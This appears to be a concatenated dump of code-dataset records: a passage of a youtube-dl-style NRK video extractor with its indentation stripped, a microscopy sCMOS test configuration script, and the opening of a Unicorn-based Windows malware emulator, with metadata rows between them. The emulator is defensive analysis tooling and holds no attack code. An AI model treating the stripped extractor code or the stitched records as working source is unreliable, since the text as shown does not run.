"url": "https://tv.nrk.no/program/mdfp15000514",
"info_dict": {
"id": "MDFP15000514",
"ext": "mp4",
"title": "Kunnskapskanalen - Grunnlovsjubiléet - Stor ståhei for ingenting",
"description": "md5:89290c5ccde1b3a24bb8050ab67fe1db",
"duration": 4605.08,
"series": "Kunnskapskanalen",
"episode": "Grunnlovsjubiléet - Stor ståhei for ingenting",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
},
{
"url": "https://tv.nrk.no/serie/tour-de-ski/MSPO40010515/06-01-2015#del=2",
"info_dict": {
"id": "MSPO40010515",
"ext": "mp4",
"title": "Sprint fri teknikk, kvinner og menn 06.01.2015",
"description": "md5:c03aba1e917561eface5214020551b7a",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
"expected_warnings": ["Failed to download m3u8 information"],
"skip": "particular part is not supported currently",
},
{
"url": "https://tv.nrk.no/serie/tour-de-ski/MSPO40010515/06-01-2015",
"info_dict": {
"id": "MSPO40010515",
"ext": "mp4",
"title": "Sprint fri teknikk, kvinner og menn 06.01.2015",
"description": "md5:c03aba1e917561eface5214020551b7a",
"age_limit": 0,
},
"expected_warnings": ["Failed to download m3u8 information"],
"skip": "Ikke tilgjengelig utenfor Norge",
},
{
"url": "https://tv.nrk.no/serie/anno/KMTE50001317/sesong-3/episode-13",
"info_dict": {
"id": "KMTE50001317",
"ext": "mp4",
"title": "Anno - 13. episode",
"description": "md5:11d9613661a8dbe6f9bef54e3a4cbbfa",
"duration": 2340,
"series": "Anno",
"episode": "13. episode",
"season_number": 3,
"episode_number": 13,
"age_limit": 0,
},
"params": {
"skip_download": True,
},
},
{
"url": "https://tv.nrk.no/serie/nytt-paa-nytt/MUHH46000317/27-01-2017",
"info_dict": {
"id": "MUHH46000317",
"ext": "mp4",
"title": "Nytt på Nytt 27.01.2017",
"description": "md5:5358d6388fba0ea6f0b6d11c48b9eb4b",
"duration": 1796,
"series": "Nytt på nytt",
"episode": "27.01.2017",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
"skip": "ProgramRightsHasExpired",
},
{
"url": "https://radio.nrk.no/serie/dagsnytt/NPUB21019315/12-07-2015#",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/lindmo/2018/MUHU11006318/avspiller",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/serie/dagsnytt/sesong/201507/NPUB21019315",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url)
return self.url_result(
"nrk:%s" % video_id, ie=NRKIE.ie_key(), video_id=video_id
)
class NRKTVEpisodeIE(InfoExtractor):
_VALID_URL = r"https?://tv\.nrk\.no/serie/(?P<id>[^/]+/sesong/(?P<season_number>\d+)/episode/(?P<episode_number>\d+))"
_TESTS = [
{
"url": "https://tv.nrk.no/serie/hellums-kro/sesong/1/episode/2",
"info_dict": {
"id": "MUHH36005220",
"ext": "mp4",
"title": "Hellums kro - 2. Kro, krig og kjærlighet",
"description": "md5:ad92ddffc04cea8ce14b415deef81787",
"duration": 1563.92,
"series": "Hellums kro",
"season_number": 1,
"episode_number": 2,
"episode": "2. Kro, krig og kjærlighet",
"age_limit": 6,
},
"params": {
"skip_download": True,
},
},
{
"url": "https://tv.nrk.no/serie/backstage/sesong/1/episode/8",
"info_dict": {
"id": "MSUI14000816",
"ext": "mp4",
"title": "Backstage - 8. episode",
"description": "md5:de6ca5d5a2d56849e4021f2bf2850df4",
"duration": 1320,
"series": "Backstage",
"season_number": 1,
"episode_number": 8,
"episode": "8. episode",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
"skip": "ProgramRightsHasExpired",
},
]
def _real_extract(self, url):
display_id, season_number, episode_number = re.match(
self._VALID_URL, url
).groups()
webpage = self._download_webpage(url, display_id)
info = self._search_json_ld(webpage, display_id, default={})
nrk_id = (
info.get("@id")
or self._html_search_meta("nrk:program-id", webpage, default=None)
or self._search_regex(
r'data-program-id=["\'](%s)' % NRKTVIE._EPISODE_RE, webpage, "nrk id"
)
)
assert re.match(NRKTVIE._EPISODE_RE, nrk_id)
info.update(
{
"_type": "url",
"id": nrk_id,
"url": "nrk:%s" % nrk_id,
"ie_key": NRKIE.ie_key(),
"season_number": int(season_number),
"episode_number": int(episode_number),
}
)
return info
class NRKTVSerieBaseIE(NRKBaseIE):
def _extract_entries(self, entry_list):
if not isinstance(entry_list, list):
return []
entries = []
for episode in entry_list:
nrk_id = episode.get("prfId") or episode.get("episodeId")
if not nrk_id or not isinstance(nrk_id, compat_str):
continue
entries.append(
self.url_result("nrk:%s" % nrk_id, ie=NRKIE.ie_key(), video_id=nrk_id)
)
return entries
_ASSETS_KEYS = (
"episodes",
"instalments",
)
def _extract_assets_key(self, embedded):
for asset_key in self._ASSETS_KEYS:
if embedded.get(asset_key):
return asset_key
@staticmethod
def _catalog_name(serie_kind):
return "podcast" if serie_kind in ("podcast", "podkast") else "series"
def _entries(self, data, display_id):
for page_num in itertools.count(1):
embedded = data.get("_embedded") or data
if not isinstance(embedded, dict):
break
assets_key = self._extract_assets_key(embedded)
if not assets_key:
break
# Extract entries
entries = try_get(
embedded,
(
lambda x: x[assets_key]["_embedded"][assets_key],
lambda x: x[assets_key],
),
list,
)
for e in self._extract_entries(entries):
yield e
# Find next URL
next_url_path = try_get(
data,
(
lambda x: x["_links"]["next"]["href"],
lambda x: x["_embedded"][assets_key]["_links"]["next"]["href"],
),
compat_str,
)
if not next_url_path:
break
data = self._call_api(
next_url_path,
display_id,
note="Downloading %s JSON page %d" % (assets_key, page_num),
fatal=False,
)
if not data:
break
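    # Shape of the catalog JSON this walker assumes (inferred from the
    # try_get lookups above, not an official schema), roughly:
    #   {"_embedded": {"episodes": {"_embedded": {"episodes": [...]},
    #                               "_links": {"next": {"href": "/..."}}}}}
    # Pagination follows "_links.next.href" until a page is missing or empty.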
class NRKTVSeasonIE(NRKTVSerieBaseIE):
_VALID_URL = r"""(?x)
https?://
(?P<domain>tv|radio)\.nrk\.no/
(?P<serie_kind>serie|pod[ck]ast)/
(?P<serie>[^/]+)/
(?:
(?:sesong/)?(?P<id>\d+)|
sesong/(?P<id_2>[^/?#&]+)
)
"""
_TESTS = [
{
"url": "https://tv.nrk.no/serie/backstage/sesong/1",
"info_dict": {
"id": "backstage/1",
"title": "Sesong 1",
},
"playlist_mincount": 30,
},
{
# no /sesong/ in path
"url": "https://tv.nrk.no/serie/lindmo/2016",
"info_dict": {
"id": "lindmo/2016",
"title": "2016",
},
"playlist_mincount": 29,
},
{
# weird nested _embedded in catalog JSON response
"url": "https://radio.nrk.no/serie/dickie-dick-dickens/sesong/1",
"info_dict": {
"id": "dickie-dick-dickens/1",
"title": "Sesong 1",
},
"playlist_mincount": 11,
},
{
# 841 entries, multi page
"url": "https://radio.nrk.no/serie/dagsnytt/sesong/201509",
"info_dict": {
"id": "dagsnytt/201509",
"title": "September 2015",
},
"playlist_mincount": 841,
},
{
# 180 entries, single page
"url": "https://tv.nrk.no/serie/spangas/sesong/1",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/hele_historien/sesong/diagnose-kverulant",
"info_dict": {
"id": "hele_historien/diagnose-kverulant",
"title": "Diagnose kverulant",
},
"playlist_mincount": 3,
},
{
"url": "https://radio.nrk.no/podkast/loerdagsraadet/sesong/202101",
"only_matching": True,
},
]
@classmethod
def suitable(cls, url):
return (
False
if NRKTVIE.suitable(url)
or NRKTVEpisodeIE.suitable(url)
or NRKRadioPodkastIE.suitable(url)
else super(NRKTVSeasonIE, cls).suitable(url)
)
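    # Note: season URLs also match the broader programme/episode/podcast
    # patterns, so suitable() steps aside whenever one of those more specific
    # extractors already claims the URL, keeping dispatch deterministic.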
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
domain = mobj.group("domain")
serie_kind = mobj.group("serie_kind")
serie = mobj.group("serie")
season_id = mobj.group("id") or mobj.group("id_2")
display_id = "%s/%s" % (serie, season_id)
data = self._call_api(
"%s/catalog/%s/%s/seasons/%s"
% (domain, self._catalog_name(serie_kind), serie, season_id),
display_id,
"season",
query={"pageSize": 50},
)
title = try_get(data, lambda x: x["titles"]["title"], compat_str) or display_id
return self.playlist_result(self._entries(data, display_id), display_id, title)
class NRKTVSeriesIE(NRKTVSerieBaseIE):
_VALID_URL = r"https?://(?P<domain>(?:tv|radio)\.nrk|(?:tv\.)?nrksuper)\.no/(?P<serie_kind>serie|pod[ck]ast)/(?P<id>[^/]+)"
_TESTS = [
{
# new layout, instalments
"url": "https://tv.nrk.no/serie/groenn-glede",
"info_dict": {
"id": "groenn-glede",
"title": "Grønn glede",
"description": "md5:7576e92ae7f65da6993cf90ee29e4608",
},
"playlist_mincount": 90,
},
{
# new layout, instalments, more entries
"url": "https://tv.nrk.no/serie/lindmo",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/blank",
"info_dict": {
"id": "blank",
"title": "Blank",
"description": "md5:7664b4e7e77dc6810cd3bca367c25b6e",
},
"playlist_mincount": 30,
},
{
# new layout, seasons
"url": "https://tv.nrk.no/serie/backstage",
"info_dict": {
"id": "backstage",
"title": "Backstage",
"description": "md5:63692ceb96813d9a207e9910483d948b",
},
"playlist_mincount": 60,
},
{
# old layout
"url": "https://tv.nrksuper.no/serie/labyrint",
"info_dict": {
"id": "labyrint",
"title": "Labyrint",
"description": "I Daidalos sin undersjøiske Labyrint venter spennende oppgaver, skumle robotskapninger og slim.",
},
"playlist_mincount": 3,
},
{
"url": "https://tv.nrk.no/serie/broedrene-dal-og-spektralsteinene",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/saving-the-human-race",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/postmann-pat",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/serie/dickie-dick-dickens",
"info_dict": {
"id": "dickie-dick-dickens",
"title": "Dickie Dick Dickens",
"description": "md5:19e67411ffe57f7dce08a943d7a0b91f",
},
"playlist_mincount": 8,
},
{
"url": "https://nrksuper.no/serie/labyrint",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers",
"info_dict": {
"id": "ulrikkes_univers",
},
"playlist_mincount": 10,
},
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers/nrkno-poddkast-26588-134079-05042018030000",
"only_matching": True,
},
]
@classmethod
def suitable(cls, url):
return (
False
if any(
ie.suitable(url)
for ie in (NRKTVIE, NRKTVEpisodeIE, NRKRadioPodkastIE, NRKTVSeasonIE)
)
else super(NRKTVSeriesIE, cls).suitable(url)
)
def _real_extract(self, url):
site, serie_kind, series_id = re.match(self._VALID_URL, url).groups()
is_radio = site == "radio.nrk"
domain = "radio" if is_radio else "tv"
size_prefix = "p" if is_radio else "embeddedInstalmentsP"
series = self._call_api(
"%s/catalog/%s/%s" % (domain, self._catalog_name(serie_kind), series_id),
series_id,
"serie",
query={size_prefix + "ageSize": 50},
)
titles = (
try_get(
series,
[
lambda x: x["titles"],
lambda x: x[x["type"]]["titles"],
lambda x: x[x["seriesType"]]["titles"],
],
)
or {}
)
entries = []
entries.extend(self._entries(series, series_id))
embedded = series.get("_embedded") or {}
linked_seasons = try_get(series, lambda x: x["_links"]["seasons"]) or []
embedded_seasons = embedded.get("seasons") or []
if len(linked_seasons) > len(embedded_seasons):
for season in linked_seasons:
season_url = urljoin(url, season.get("href"))
if not season_url:
season_name = season.get("name")
if season_name and isinstance(season_name, compat_str):
season_url = "https://%s.nrk.no/serie/%s/sesong/%s" % (
domain,
series_id,
season_name,
)
if season_url:
entries.append(
self.url_result(
season_url,
ie=NRKTVSeasonIE.ie_key(),
video_title=season.get("title"),
)
)
else:
for season in embedded_seasons:
entries.extend(self._entries(season, series_id))
entries.extend(self._entries(embedded.get("extraMaterial") or {}, series_id))
return self.playlist_result(
entries, series_id, titles.get("title"), titles.get("subtitle")
)
class NRKTVDirekteIE(NRKTVIE):
IE_DESC = "NRK TV Direkte and NRK Radio Direkte"
_VALID_URL = r"https?://(?:tv|radio)\.nrk\.no/direkte/(?P<id>[^/?#&]+)"
_TESTS = [
{
"url": "https://tv.nrk.no/direkte/nrk1",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/direkte/p1_oslo_akershus",
"only_matching": True,
},
]
class NRKRadioPodkastIE(InfoExtractor):
_VALID_URL = r"https?://radio\.nrk\.no/pod[ck]ast/(?:[^/]+/)+(?P<id>l_[\da-f]{8}-[\da-f]{4}-[\da-f]{4}-[\da-f]{4}-[\da-f]{12})"
_TESTS = [
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"md5": "8d40dab61cea8ab0114e090b029a0565",
"info_dict": {
"id": "MUHH48000314AA",
"ext": "mp4",
"title": "20 spørsmål 23.05.2014",
"description": "md5:bdea103bc35494c143c6a9acdd84887a",
"duration": 1741,
"series": "20 spørsmål",
"episode": "23.05.2014",
},
},
{
"url": "https://radio.nrk.no/podcast/ulrikkes_univers/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers/sesong/1/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/hele_historien/sesong/bortfoert-i-bergen/l_774d1a2c-7aa7-4965-8d1a-2c7aa7d9652c",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url)
return self.url_result(
"nrk:%s" % video_id, ie=NRKIE.ie_key(), video_id=video_id
)
class NRKPlaylistBaseIE(InfoExtractor):
def _extract_description(self, webpage):
pass
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
entries = [
self.url_result("nrk:%s" % video_id, NRKIE.ie_key())
for video_id in re.findall(self._ITEM_RE, webpage)
]
playlist_title = self._extract_title(webpage)
playlist_description = self._extract_description(webpage)
return self.playlist_result(
entries, playlist_id, playlist_title, playlist_description
)
class NRKPlaylistIE(NRKPlaylistBaseIE):
_VALID_URL = r"https?://(?:www\.)?nrk\.no/(?!video|skole)(?:[^/]+/)+(?P<id>[^/]+)"
_ITEM_RE = r'class="[^"]*\brich\b[^"]*"[^>]+data-video-id="([^"]+)"'
_TESTS = [
{
"url": "http://www.nrk.no/troms/gjenopplev-den-historiske-solformorkelsen-1.12270763",
"info_dict": {
"id": "gjenopplev-den-historiske-solformorkelsen-1.12270763",
"title": "Gjenopplev den historiske solformørkelsen",
"description": "md5:c2df8ea3bac5654a26fc2834a542feed",
},
"playlist_count": 2,
},
{
"url": "http://www.nrk.no/kultur/bok/rivertonprisen-til-karin-fossum-1.12266449",
"info_dict": {
"id": "rivertonprisen-til-karin-fossum-1.12266449",
"title": "Rivertonprisen til Karin Fossum",
"description": "Første kvinne på 15 år til å vinne krimlitteraturprisen.",
},
"playlist_count": 2,
},
]
def _extract_title(self, webpage):
return self._og_search_title(webpage, fatal=False)
def _extract_description(self, webpage):
return self._og_search_description(webpage)
class NRKTVEpisodesIE(NRKPlaylistBaseIE):
_VALID_URL = r"https?://tv\.nrk\.no/program/[Ee]pisodes/[^/]+/(?P<id>\d+)"
_ITEM_RE = r'data-episode=["\']%s' % NRKTVIE._EPISODE_RE
_TESTS = [
{
"url": "https://tv.nrk.no/program/episodes/nytt-paa-nytt/69031",
"info_dict": {
"id": "69031",
"title": "Nytt på nytt, sesong: 201210",
},
"playlist_count": 4,
}
]
def _extract_title(self, webpage):
return self._html_search_regex(
r"<h1>([^<]+)</h1>", webpage, "title", fatal=False
)
class NRKSkoleIE(InfoExtractor):
IE_DESC = "NRK Skole"
_VALID_URL = r"https?://(?:www\.)?nrk\.no/skole/?\?.*\bmediaId=(?P<id>\d+)"
_TESTS = [
{
"url": "https://www.nrk.no/skole/?page=search&q=&mediaId=14099",
"md5": "18c12c3d071953c3bf8d54ef6b2587b7",
"info_dict": {
"id": "6021",
"ext": "mp4",
"title": "Genetikk og eneggede tvillinger",
"description": "md5:3aca25dcf38ec30f0363428d2b265f8d",
"duration": 399,
},
},
{
"url": "https://www.nrk.no/skole/?page=objectives&subject=naturfag&objective=K15114&mediaId=19355",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url)
nrk_id = self._download_json(
"https://nrkno-skole-prod.kube.nrk.no/skole/api/media/%s" % video_id,
video_id,
)["psId"]
return self.url_result("nrk:%s" % nrk_id)
| true
| true
|
f70b3938b82bcdff4d037cfe9f07cbf0b506cfc7
| 4,413
|
py
|
Python
|
storm_analysis/diagnostics/sCMOS/configure.py
|
simone-codeluppi/storm-analysis
|
fa50fb7d670e9e4d712fa6fafb398963b39e209b
|
[
"CNRI-Python"
] | null | null | null |
storm_analysis/diagnostics/sCMOS/configure.py
|
simone-codeluppi/storm-analysis
|
fa50fb7d670e9e4d712fa6fafb398963b39e209b
|
[
"CNRI-Python"
] | null | null | null |
storm_analysis/diagnostics/sCMOS/configure.py
|
simone-codeluppi/storm-analysis
|
fa50fb7d670e9e4d712fa6fafb398963b39e209b
|
[
"CNRI-Python"
] | 1
|
2021-04-19T18:17:06.000Z
|
2021-04-19T18:17:06.000Z
|
#!/usr/bin/env python
"""
Configure folder for sCMOS testing.
Hazen 09/17
"""
import numpy
import os
import storm_analysis
import storm_analysis.sa_library.parameters as parameters
import storm_analysis.simulator.emitters_on_grid as emittersOnGrid
import storm_analysis.simulator.emitters_uniform_random as emittersUniformRandom
import storm_analysis.diagnostics.sCMOS.settings as settings
def testingParameters(cal_file):
"""
Create a sCMOS parameters object.
"""
params = parameters.ParametersSCMOS()
params.setAttr("max_frame", "int", -1)
params.setAttr("start_frame", "int", -1)
params.setAttr("background_sigma", "float", 8.0)
params.setAttr("camera_calibration", "filename", cal_file)
params.setAttr("find_max_radius", "int", 5)
params.setAttr("fit_error_model", "string", settings.fit_error_model)
params.setAttr("foreground_sigma", "float", 1.5)
params.setAttr("iterations", "int", settings.iterations)
params.setAttr("model", "string", settings.model)
params.setAttr("pixel_size", "float", settings.pixel_size)
params.setAttr("roi_size", "int", settings.roi_size)
params.setAttr("sigma", "float", 1.5)
params.setAttr("threshold", "float", settings.threshold)
# Don't do tracking.
params.setAttr("descriptor", "string", "1")
params.setAttr("radius", "float", "0.0")
# Don't do drift-correction.
params.setAttr("d_scale", "int", 2)
params.setAttr("drift_correction", "int", 0)
params.setAttr("frame_step", "int", 500)
params.setAttr("z_correction", "int", 0)
# Z fitting.
#
    # These are nonsense values. We test either '2D' or '3D' mode
# and check how well we do at fitting the localization widths.
#
params.setAttr("do_zfit", "int", 0)
params.setAttr("cutoff", "float", 0.0)
params.setAttr("max_z", "float", 0.5)
params.setAttr("min_z", "float", -0.5)
params.setAttr("z_value", "float", 0.0)
params.setAttr("z_step", "float", 1.0)
params.setAttr("wx_wo", "float", 1.0)
params.setAttr("wx_c", "float", 1.0)
params.setAttr("wx_d", "float", 1.0)
params.setAttr("wxA", "float", 0.0)
params.setAttr("wxB", "float", 0.0)
params.setAttr("wxC", "float", 0.0)
params.setAttr("wxD", "float", 0.0)
params.setAttr("wy_wo", "float", 1.0)
params.setAttr("wy_c", "float", 1.0)
params.setAttr("wy_d", "float", 1.0)
params.setAttr("wyA", "float", 0.0)
params.setAttr("wyB", "float", 0.0)
params.setAttr("wyC", "float", 0.0)
params.setAttr("wyD", "float", 0.0)
# 'peak_locations' testing.
if hasattr(settings, "peak_locations") and (settings.peak_locations is not None):
params.setAttr("peak_locations", "filename", settings.peak_locations)
return params
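# Illustrative usage (hypothetical, mirroring configure() below): the returned
# ParametersSCMOS object is serialized straight to XML, e.g.
#   params = testingParameters("calib.npy")
#   params.toXMLFile("scmos.xml", pretty = True)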
def configure(cal_file = None):
# Create sCMOS calibration file if not specified.
#
if cal_file is None:
cal_file = "calib.npy"
offset = numpy.zeros((settings.y_size, settings.x_size)) + settings.camera_offset
variance = numpy.ones((settings.y_size, settings.x_size)) * settings.camera_variance
gain = numpy.ones((settings.y_size, settings.x_size)) * settings.camera_gain
rqe = numpy.ones((settings.y_size, settings.x_size))
numpy.save(cal_file, [offset, variance, gain, rqe, 2])
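    # Note (version-dependent, editor's hedge): newer numpy releases may
    # refuse to build an array from this ragged list (2-D arrays plus the
    # scalar 2) without an explicit dtype=object array.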
# Create parameters file for analysis.
#
print("Creating XML file.")
params = testingParameters(cal_file)
params.toXMLFile("scmos.xml", pretty = True)
# Create localization on a grid file.
#
print("Creating gridded localization.")
emittersOnGrid.emittersOnGrid("grid_list.hdf5",
settings.nx,
settings.ny,
1.5,
20,
0.0,
0.0)
# Create randomly located localizations file.
#
print("Creating random localization.")
emittersUniformRandom.emittersUniformRandom("random_list.hdf5",
1.0,
10,
settings.x_size,
settings.y_size,
0.0)
if (__name__ == "__main__"):
configure()
| 34.476563
| 92
| 0.603898
|
| true
| true
|
f70b39f8922b10c9be5f4991136c6b870360b0d8
| 32,982
|
py
|
Python
|
emulator.py
|
GuillaumeOrlando/Windows_Malware_Emulator
|
6f49d424266d0126f359e4e4db66b690788f3b6a
|
[
"Apache-2.0"
] | 11
|
2021-03-16T18:41:29.000Z
|
2022-01-11T15:39:19.000Z
|
emulator.py
|
GuillaumeOrlando/Windows_Malware_Emulator
|
6f49d424266d0126f359e4e4db66b690788f3b6a
|
[
"Apache-2.0"
] | null | null | null |
emulator.py
|
GuillaumeOrlando/Windows_Malware_Emulator
|
6f49d424266d0126f359e4e4db66b690788f3b6a
|
[
"Apache-2.0"
] | null | null | null |
from unicorn import *
from unicorn.x86_const import *
from capstone import *
from importlib import import_module
from emulation.syscall import clean_stack
import argparse
import emulation.syscall as winsyscall
import pefile
import struct
import sys
import ast
import os
#TODO: Deal with SEH structure
#TODO: Randomize TEB base address
#TODO: Randomize process ID
#TODO: Randomize thread ID
#TODO: Process management
#TODO: Thread management
#TODO: Fake FileSystem
#TODO: Fake running process
API_refs = 'winapi_9k.csv'
regs = ['eax', 'ebx', 'ecx', 'edx', 'esp', 'ebp', 'edi', 'esi']
md = Cs(CS_ARCH_X86, CS_MODE_32)
full_content = ''
class Environment:
def __init__(self, args):
# Argument validation
self.breakpoint = args.breakpoint
self.trace = args.trace
self.dump = args.dump
self.silent = args.silent
self.out = args.out
self.stack = args.stack
self.registers = args.registers
self.debug = args.debug
self.handle_list = args.handle
self.show_extract = args.extract
self.imports = args.imports
self.dynamics = []
if self.trace:
self.calltrace = []
if self.stack and self.registers:
self.dump = True
if self.dump:
self.registers = True
self.stack = True
path = args.path
self.shortname = path.split('/')[-1].split('.')[0].lower()
self.drivename = 'C:\\Users\\EllenRipley\\Desktop\\' + self.shortname
self.username = 'EllenRipley'
self.computername = 'Nostromo'
self.computer_mac = '0F-0C-95-86-20-29'
self.computer_ip = '192.168.0.12'
self.path = path
self.chunks = []
self.virtual_memory = []
self.resources = {}
self.extracts = {}
self.threads = []
self.thread_ret = None
self.thread_trace = []
self.thread_max_replay = 5
self.max_loop = 10
self.current_loop_counter = 0
self.previous_loop = []
self.current_loop = []
self.execution_mode = 'default'
self.uc = Uc(UC_ARCH_X86, UC_MODE_32)
self.handle = {'0xaa': ['placeholder_dynamic_handle', 'dummy']}
try:
self.pe = pefile.PE(path)
except OSError as e:
print(e)
            sys.exit(-1)
        except pefile.PEFormatError as e:
            print(f'Malformed or invalid PE file: {e.value}')
            sys.exit(-1)
# Log every instruction emulated
def hook_code(self, a, address, size, user_data):
instruction = self.uc.mem_read(address, size)
# Manual Breakpoint
if self.breakpoint:
if hex(address) == self.breakpoint:
final_esp = self.uc.reg_read(UC_X86_REG_ESP)
final_ebp = self.uc.reg_read(UC_X86_REG_EBP)
self.uc.emu_stop()
                if self.trace:
                    self.calltrace.append('breakpoint')
print('[+] Breakpoint hits at 0x%08x' % int(self.breakpoint, 16))
return
# Out of function range
for i in md.disasm(instruction, address):
#if 'int' in i.mnemonic:
#original_eip = self.uc.reg_read(UC_X86_REG_EIP)
#self.uc.reg_write(UC_X86_REG_EIP, original_eip + len(i.bytes))
#return
if i.mnemonic == 'add' and i.op_str == 'byte ptr [eax], al':
print('[!] End of the main emulation thread')
self.uc.emu_stop()
return
# Bypass traps to debuger
#if str(i.mnemonic) == 'int3':
# if not self.silent:
            #        print('> Tracing instruction ' + hex(i.address), ':', i.mnemonic, i.op_str)
# original_eip = self.uc.reg_read(UC_X86_REG_EIP)
# self.uc.reg_write(UC_X86_REG_EIP, original_eip + len(i.bytes))
if str(i.mnemonic) == 'call' and 'dword ptr [' in i.op_str:
target = i.op_str.split('[')[1].split(']')[0]
if target not in self.raw_IAT and self.silent:
                    # print('[CHECKME]> Tracing instruction ' + hex(i.address), ':', i.mnemonic, i.op_str)
self.hook_syscall(i.op_str, 'call', i.address, i.bytes)
else:
self.hook_syscall(i.op_str, 'call', i.address, i.bytes)
elif str(i.mnemonic) == 'call':
#print('[Debug]', i.mnemonic, i.op_str)
self.hook_syscall(i.op_str, 'call', i.address, i.bytes)
elif str(i.mnemonic) == 'jmp' and 'dword ptr [' in i.op_str:
target = i.op_str.split('[')[1].split(']')[0]
if i.op_str in regs:
dest_addr = '0x%08x' % eval('self.uc.reg_read(UC_X86_REG_' + i.op_str.replace(' ','').upper() + ')')
elif ('+' in i.op_str or '-' in i.op_str or '*' in i.op_str):
left_elem = i.op_str.split('[')[1].split(']')[0].split(' ')[0].replace(' ', '')
operator = i.op_str.split('[')[1].split(']')[0].split(' ')[1].replace(' ', '')
right_elem = i.op_str.split('[')[1].split(']')[0].split(' ')[2].replace(' ', '')
# call/jmp [eax+4]
if left_elem in regs:
left_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + left_elem.upper())))
dest_addr_ptr = '0x%08x' % eval(left_value + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
target = '0x%08x' % struct.unpack('I', content)[0]
# call/jmp [eax*4 + 10]
elif '+' in left_elem or '-' in left_elem or '*' in left_elem:
lleft_elem = left_elem.split('*')[0].split('-')[0].split('+')[0]
lleft_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + lleft_elem.upper())))
lleft_op = left_elem.replace(lleft_elem, lleft_value)
dest_addr_ptr = '0x%08x' % eval(lleft_op + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
target = '0x%06x' % struct.unpack('I', content)[0]
else:
print('[-] Something went terribly wrong')
exit(1)
else:
target = i.op_str.split('[')[1].split(']')[0]
if target not in self.raw_IAT:
#self.hook_syscall(i.op_str, 'jmp', i.address, i.bytes)
if not self.silent:
                        print('> Tracing instruction ' + hex(i.address), ':', i.mnemonic, i.op_str)
#return
self.hook_syscall(i.op_str, 'jmp', i.address, i.bytes)
else:
self.hook_syscall(i.op_str, 'jmp', i.address, i.bytes)
else:
if not self.silent:
                    print('> Tracing instruction ' + hex(i.address), ':', i.mnemonic, i.op_str)
# Hook and trace syscalls
def hook_syscall(self, instruction, mnemonic, addr, byte):
if self.execution_mode == 'thread':
self.thread_trace.append(addr)
dup_api = {i:self.thread_trace.count(i) for i in self.thread_trace}
for elem in dup_api:
rep = dup_api[elem]
if rep >= self.thread_max_replay:
self.uc.emu_stop()
if self.debug:
                        print('[!] Thread stopped due to its repetition (infinite loop)')
return
is_ptr = False
if '[' in instruction:
is_ptr = True
try:
if instruction in regs:
dest_addr = '0x%08x' % eval('self.uc.reg_read(UC_X86_REG_' + instruction.replace(' ','').upper() + ')')
elif ('+' in instruction or '-' in instruction) and is_ptr:
left_elem = instruction.split('[')[1].split(']')[0].split(' ')[0].replace(' ', '')
operator = instruction.split('[')[1].split(']')[0].split(' ')[1].replace(' ', '')
right_elem = instruction.split('[')[1].split(']')[0].split(' ')[2].replace(' ', '')
# call/jmp [eax+4]
if left_elem in regs:
left_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + left_elem.upper())))
dest_addr_ptr = '0x%08x' % eval(left_value + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
dest_addr = '0x%08x' % struct.unpack('I', content)[0]
# call/jmp [eax*4 + 10]
elif '+' in left_elem or '-' in left_elem or '*' in left_elem:
lleft_elem = left_elem.split('*')[0].split('-')[0].split('+')[0]
lleft_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + lleft_elem.upper())))
lleft_op = left_elem.replace(lleft_elem, lleft_value)
dest_addr_ptr = '0x%08x' % eval(lleft_op + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
dest_addr = '0x%08x' % struct.unpack('I', content)[0]
else:
print('[-] Something went terribly wrong')
exit(1)
else:
dest_addr = '0x' + instruction.split('0x')[1].replace(']','')
except:
            print('[-] Weird call at 0x%08X, investigate me! "%s %s"' % (addr, mnemonic, instruction))
return
        # Are we calling a function from the IAT in a weird way?
#print(self.IAT)
if str(dest_addr) in self.IAT_hook.values():
target_iat_call = list(self.IAT_hook.keys())[list(self.IAT_hook.values()).index(dest_addr)]
for dll in self.IAT:
for func_addr in self.IAT[dll]:
func_name = self.IAT[dll].get(func_addr)
if func_name == target_iat_call:
#print('[*] IAT call detected:', target_iat_call, func_addr)
dest_addr = func_addr
break
#return
        # Is this targeting the IAT or a mapped function?
api_name_tmp = None
IAT_entry = list(self.raw_IAT.keys())
if dest_addr not in IAT_entry:
if is_ptr:
raw_ptr = self.uc.mem_read(int(dest_addr, 16), 0x4)
ptr = '0x%08x' % struct.unpack('<I', raw_ptr)[0]
if ptr in self.IAT_hook.values():
try:
api_name_tmp = [k for k,v in self.IAT_hook.items() if v == ptr][0]
except:
api_name_tmp = None
else:
if not self.silent:
                    print('> Tracing instruction ' + hex(addr), ':', mnemonic, self.shortname + '.' + str(instruction))
print('> Following function ' + self.shortname + '.' + str(instruction) + ':')
if self.trace:
self.calltrace.append(self.shortname + '.' + str(instruction))
return
